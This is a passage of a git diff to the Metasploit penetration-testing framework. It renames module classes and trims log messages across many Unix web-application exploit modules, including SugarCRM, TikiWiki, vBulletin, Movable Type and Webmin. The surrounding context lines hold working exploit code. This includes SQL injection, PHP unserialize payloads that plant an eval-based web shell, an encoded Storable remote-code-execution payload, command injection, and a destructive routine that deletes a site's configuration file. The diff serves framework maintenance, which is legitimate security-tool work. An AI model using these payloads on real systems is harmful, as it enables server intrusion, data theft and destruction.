'vars_get' => { "sp_id" => sqli }, @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin session is [ #{adminhash} ]") + print_status("Admin session is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin", "downloads.php"), @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") + print_status("Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}") @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 5503487ccc..b0e2edb30b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -69,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ - vprint_error("#{peer} - File uploads are disabled") + vprint_error("File uploads are disabled") return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) - print_good("#{peer} - Payload uploaded successfully.") + print_good("Payload uploaded successfully.") register_files_for_cleanup(@fname) if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/ @upload_path = normalize_uri(target_uri.path, "#{$1}") - print_good("#{peer} - Found upload path #{@upload_path}") + print_good("Found upload path #{@upload_path}") else @upload_path = normalize_uri(target_uri.path, 'in') - print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + print_warning("Could not find upload path - assuming '#{@upload_path}'") end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote # Executes our uploaded malicious file # def exec - print_status("#{peer} - Executing #{@fname}...") + print_status("Executing #{@fname}...") res = send_request_raw({ 'uri' => normalize_uri(@upload_path, @fname), 'cookie' => 'access=3' diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 3bdd447427..1e47de44e0 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ print "LFI test for storable flaw is: $frozen\n"; =end def check - vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), @@ -103,14 +103,14 @@ print "LFI test for storable flaw is: $frozen\n"; }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") - vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit - if datastore['DESTRUCTIVE'] == true + if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive @@ -158,14 +158,14 @@ print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive - print_status("#{peer} - Using nondestructive attack method") + print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', @@ -201,10 +201,10 @@ print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive - print_status("#{peer} - Using destructive attack method") + print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection - print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', @@ -224,7 +224,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Now we rewrite mt-config.cgi to accept a payload - print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', @@ -247,7 +247,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Finally send the payload - print_status("#{peer} - Sending payload request") + print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index a67c67bbb0..3f4535f7cc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => uri) if res and res.body =~ /[1.1 r248]/ - vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found") return Exploit::CheckCode::Appears end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") - vprint_status("#{peer} - Sending request to #{uri}.") + vprint_status("Sending request to #{uri}.") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index fdfed0a499..1633e81cde 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 06bd9ecd7c..5d7cc5c5e9 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index a8303ca871..bd489e6b3a 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index a116da0fa5..61eba13594 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 6c08aaa9af..a659def99d 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{f}") + print_warning("Deleting #{f}") client.fs.file.rm(f) - print_good("#{peer} - #{f} removed to stay ninja") + print_good("#{f} removed to stay ninja") rescue - print_warning("#{peer} - Unable to remove #{f}") + print_warning("Unable to remove #{f}") end end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") data = "module=Contacts&" data << "Contacts2_CONTACT_offset=1&" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" - print_status("#{peer} - Exploiting the unserialize()") + print_status("Exploiting the unserialize()") res = send_request_cgi( { @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}") end - print_status("#{peer} - Executing the payload") + print_status("Executing the payload") res = send_request_cgi( { diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 04e6167531..de46b20848 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index a1ba47c228..4d46b0051f 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index b54648b7f0..0839e46091 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" - print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem") + print_status("Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => normalize_uri(base, "tiki-rss_error.php") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote return else tiki_path = $1 - print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}" + print_good "Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") + print_error("Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_cgi( { @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 817d0d3a3e..777ae27a6c 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -6,7 +6,7 @@ # -*- coding: utf-8 -*- require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/ diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 037463b905..56144a5917 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def do_login() - print_status("#{peer} - Logging in...") + print_status("Logging in...") username = datastore['USERNAME'] password = datastore['PASSWORD'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") res.get_cookies end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the PHP object injection...") + print_status("Exploiting the PHP object injection...") exec_php(payload.encoded) end end diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 0e2e00d06c..6cc5113f2e 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index c371316749..73207fd2a9 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 95ed12f2fe..183f696ffb 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index da87cb4613..6f94c0aa4e 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -356,18 +356,18 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(session) - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end @@ -425,22 +425,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.empty? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i users = [] - print_good("#{peer} - #{count_users} users found") + print_good("#{count_users} users found") for i in 0..count_users - 1 user = get_user_data(node_id, i) @@ -466,10 +466,10 @@ class Metasploit3 < Msf::Exploit::Remote @session = nil users.each do |user| - print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...") + print_status("Trying to log into vBulletin admin control panel as #{user[0]}...") @session = do_login(user[0], user[1]) unless @session.blank? - print_good("#{peer} - Logged in successfully as #{user[0]}") + print_good("Logged in successfully as #{user[0]}") break end end @@ -478,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel") end - print_status("#{peer} - Getting the install product security token...") + print_status("Getting the install product security token...") install_token = get_install_token if install_token.nil? fail_with(Failure::Unknown, "#{peer} - Failed to get the install token") @@ -486,9 +486,9 @@ class Metasploit3 < Msf::Exploit::Remote @session_hash = install_token[:session_hash] @product_id = rand_text_alpha_lower(5 + rand(8)) - print_status("#{peer} - Installing the malicious product #{@product_id}...") + print_status("Installing the malicious product #{@product_id}...") if install_product(install_token) - print_good("#{peer} - Product successfully installed... payload should be executed...") + print_good("Product successfully installed... payload should be executed...") else # Two situations trigger this path: # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often. @@ -497,18 +497,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 652d68b0fe..01ea8823c6 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -154,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ - vprint_error("#{peer} - Invalid Username or Password.") + vprint_error("Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ - vprint_error("#{peer} - Web client session not found") + vprint_error("Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking if injection is possible...") + print_status("Checking if injection is possible...") res = request('ls -a .') unless res and res.code == 200 @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? - print_error("#{peer} - Valid web client session not found, trying to create one...") + print_error("Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") end - print_good("#{peer} - Exploitation looks feasible, proceeding... ") + print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 29c80dd4bf..c058cbf271 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Attempting to login...") + vprint_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.get_cookies =~ /sid/ - vprint_good "#{peer} - Authentication successful" + vprint_good "Authentication successful" session = res.get_cookies.split("sid=")[1].split(";")[0] else - vprint_error "#{peer} - Service found, but authentication failed" + vprint_error "Service found, but authentication failed" return Exploit::CheckCode::Detected end - vprint_status("#{peer} - Attempting to execute...") + vprint_status("Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -121,18 +121,18 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to execute the payload...") + print_status("Attempting to execute the payload...") command = payload.encoded @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - print_good "#{peer} - Payload executed successfully" + print_good "Payload executed successfully" else - print_error "#{peer} - Error executing the payload" + print_error "Error executing the payload" return end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 7d6f169d17..bf55cd2c70 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - vprint_status("#{peer} - Found version: 5.1.20101016") + vprint_status("Found version: 5.1.20101016") return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - vprint_status("#{peer} - Found version: #{$1}") + vprint_status("Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cppassword', 'cpdomain' ] - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...") + print_status("Sending payload (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install2.php'), @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 and res.body =~ /Failed to connect to database server/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::Unknown, "#{peer} - Something went wrong") end diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 7c9f49e32a..1b498ca2ea 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -68,22 +68,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - 